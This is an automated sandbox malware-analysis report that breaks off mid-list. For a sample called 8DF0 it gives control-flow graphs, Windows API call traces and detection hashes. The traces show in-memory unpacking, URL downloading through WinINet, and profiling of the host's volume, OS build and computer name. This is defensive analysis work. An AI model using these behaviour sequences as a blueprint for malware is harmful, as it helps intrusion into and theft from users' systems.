                                                    control_flow_graph 1951 248003c-2480047 1952 2480049 1951->1952 1953 248004c-2480263 call 2480a3f call 2480e0f call 2480d90 VirtualAlloc 1951->1953 1952->1953 1968 248028b-2480292 1953->1968 1969 2480265-2480289 call 2480a69 1953->1969 1970 24802a1-24802b0 1968->1970 1973 24802ce-24803c2 VirtualProtect call 2480cce call 2480ce7 1969->1973 1970->1973 1974 24802b2-24802cc 1970->1974 1980 24803d1-24803e0 1973->1980 1974->1970 1981 2480439-24804b8 VirtualFree 1980->1981 1982 24803e2-2480437 call 2480ce7 1980->1982 1983 24804be-24804cd 1981->1983 1984 24805f4-24805fe 1981->1984 1982->1980 1986 24804d3-24804dd 1983->1986 1987 248077f-2480789 1984->1987 1988 2480604-248060d 1984->1988 1986->1984 1992 24804e3-2480505 LoadLibraryA 1986->1992 1990 248078b-24807a3 1987->1990 1991 24807a6-24807b0 1987->1991 1988->1987 1993 2480613-2480637 1988->1993 1990->1991 1995 248086e-24808be LoadLibraryA 1991->1995 1996 24807b6-24807cb 1991->1996 1997 2480517-2480520 1992->1997 1998 2480507-2480515 1992->1998 1999 248063e-2480648 1993->1999 2003 24808c7-24808f9 1995->2003 2000 24807d2-24807d5 1996->2000 2001 2480526-2480547 1997->2001 1998->2001 1999->1987 2002 248064e-248065a 1999->2002 2004 2480824-2480833 2000->2004 2005 24807d7-24807e0 2000->2005 2006 248054d-2480550 2001->2006 2002->1987 2007 2480660-248066a 2002->2007 2008 24808fb-2480901 2003->2008 2009 2480902-248091d 2003->2009 2015 2480839-248083c 2004->2015 2010 24807e2 2005->2010 2011 24807e4-2480822 2005->2011 2012 24805e0-24805ef 2006->2012 2013 2480556-248056b 2006->2013 2014 248067a-2480689 2007->2014 2008->2009 2010->2004 2011->2000 2012->1986 2016 248056d 2013->2016 2017 248056f-248057a 2013->2017 2018 248068f-24806b2 2014->2018 2019 2480750-248077a 2014->2019 2015->1995 2020 248083e-2480847 2015->2020 2016->2012 2022 248059b-24805bb 2017->2022 2023 248057c-2480599 2017->2023 2024 24806ef-24806fc 2018->2024 2025 24806b4-24806ed 2018->2025 2019->1999 2026 2480849 2020->2026 2027 248084b-248086c 2020->2027 2034 24805bd-24805db 2022->2034 2023->2034 2028 248074b 2024->2028 2029 24806fe-2480748 2024->2029 2025->2024 2026->1995 2027->2015 2028->2014 2029->2028 2034->2006
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0248024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14
                                                    Function 004226E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2035 4226e0-422723 GetWindowsDirectoryA 2036 422725 2035->2036 2037 42272c-42278a GetVolumeInformationA 2035->2037 2036->2037 2038 42278c-422792 2037->2038 2039 422794-4227a7 2038->2039 2040 4227a9-4227c0 GetProcessHeap HeapAlloc 2038->2040 2039->2038 2041 4227c2-4227c4 2040->2041 2042 4227c6-4227e4 wsprintfA 2040->2042 2043 4227fb-422812 call 427210 2041->2043 2042->2043
                                                    APIs
                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00948298), ref: 0042271B
                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00948298), ref: 0042274C
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00948298), ref: 004227AF
                                                    • HeapAlloc.KERNEL32(00000000,?,00948298), ref: 004227B6
                                                    • wsprintfA.USER32 ref: 004227DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                                    • String ID: :\$C
                                                    • API String ID: 1325379522-3309953409
                                                    • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
                                                    • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5
                                                    Function 00405570 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2046 405570-4055cf GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 2047 4055d1-4055d2 2046->2047 2048 405627-40563d InternetCloseHandle * 2 2046->2048 2049 4055d8-4055f7 InternetReadFile 2047->2049 2050 4056a7-4056b1 2048->2050 2051 40563f-40564d 2048->2051 2052 405623-405626 2049->2052 2053 4055f9 2049->2053 2054 405677-40567c 2051->2054 2055 40564f-405652 2051->2055 2052->2048 2057 405600-40561d KiUserExceptionDispatcher 2053->2057 2054->2050 2056 40567e-405681 2054->2056 2055->2054 2058 405654-40565a 2055->2058 2056->2050 2059 405683-405689 2056->2059 2057->2057 2060 40561f-405621 2057->2060 2061 405661-405672 2058->2061 2062 40565c 2058->2062 2063 405691-4056a2 2059->2063 2064 40568b 2059->2064 2060->2049 2060->2052 2061->2054 2065 405674 2061->2065 2062->2061 2063->2050 2066 4056a4 2063->2066 2064->2063 2065->2054 2066->2050
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00405590
                                                    • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
                                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
                                                    • KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
                                                    • InternetCloseHandle.WININET(?), ref: 0040562B
                                                    • InternetCloseHandle.WININET(00000000), ref: 00405632
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
                                                    • String ID:
                                                    • API String ID: 1337183907-0
                                                    • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
                                                    • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98
                                                    Function 00421BD0 Relevance: 12.1, APIs: 8, Instructions: 106COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                    • Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
                                                    • Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                    • Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98
                                                    Function 00404AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2119 404ae0-404aee 2120 404af0-404af5 2119->2120 2120->2120 2121 404af7-404b68 ??2@YAPAXI@Z * 3 lstrlenA InternetCrackUrlA call 402930 2120->2121
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000800,00948368), ref: 00404B17
                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
                                                    • lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
                                                    • InternetCrackUrlA.WININET(?,00000000), ref: 00404B47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@$CrackInternetlstrlen
                                                    • String ID: <
                                                    • API String ID: 1683549937-4251816714
                                                    • Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                    • Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
                                                    • Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                    • Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4
                                                    Function 004228B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2124 4228b0-4228f3 GetProcessHeap HeapAlloc RegOpenKeyExA 2125 4228f5-422905 RegQueryValueExA 2124->2125 2126 42290b-42291e RegCloseKey 2124->2126 2125->2126 2127 422920-42292f 2126->2127 2128 422931-422934 2126->2128 2127->2127 2127->2128
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                    • RegOpenKeyExA.KERNEL32(80000002,0094B668,00000000,00020119,00422849), ref: 004228EB
                                                    • RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                    • RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                    • String ID: CurrentBuildNumber
                                                    • API String ID: 3466090806-1022791448
                                                    • Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                    • Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
                                                    • Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                    • Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0
                                                    Function 00422820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2129 422820-42284e GetProcessHeap HeapAlloc call 4228b0 2132 422850-422859 2129->2132 2133 42285a-422879 RegOpenKeyExA 2129->2133 2134 422892-4228a2 RegCloseKey 2133->2134 2135 42287b-42288c RegQueryValueExA 2133->2135 2135->2134
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0042283C
                                                      • Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                      • Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                      • Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,0094B668,00000000,00020119,00422849), ref: 004228EB
                                                      • Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                      • Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                    • RegOpenKeyExA.KERNEL32(80000002,0094B668,00000000,00020119,?), ref: 00422871
                                                    • RegQueryValueExA.KERNEL32(?,0094EB38,00000000,00000000,00000000,000000FF), ref: 0042288C
                                                    • RegCloseKey.ADVAPI32(?), ref: 00422896
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                    • String ID: Windows 11
                                                    • API String ID: 3466090806-2517555085
                                                    • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                    • Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
                                                    • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                    • Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4
                                                    Function 0041EFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2136 41efe0-41f005 call 402840 2139 41f007-41f00f 2136->2139 2140 41f019-41f01d call 406b80 2136->2140 2139->2140 2141 41f011-41f013 lstrcpy 2139->2141 2143 41f022-41f038 StrCmpCA 2140->2143 2141->2140 2144 41f061-41f068 call 402930 2143->2144 2145 41f03a-41f052 call 402930 call 402840 2143->2145 2150 41f070-41f078 2144->2150 2155 41f095-41f0f0 call 402930 * 10 2145->2155 2156 41f054-41f05c 2145->2156 2150->2150 2152 41f07a-41f087 call 402840 2150->2152 2152->2155 2160 41f089 2152->2160 2156->2155 2159 41f05e-41f05f 2156->2159 2162 41f08e-41f08f lstrcpy 2159->2162 2160->2162 2162->2155
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F013
                                                    • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: ERROR
                                                    • API String ID: 3722407311-2861137601
                                                    • Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
                                                    • Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
                                                    • Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
                                                    • Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798
                                                    Function 00422A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
                                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
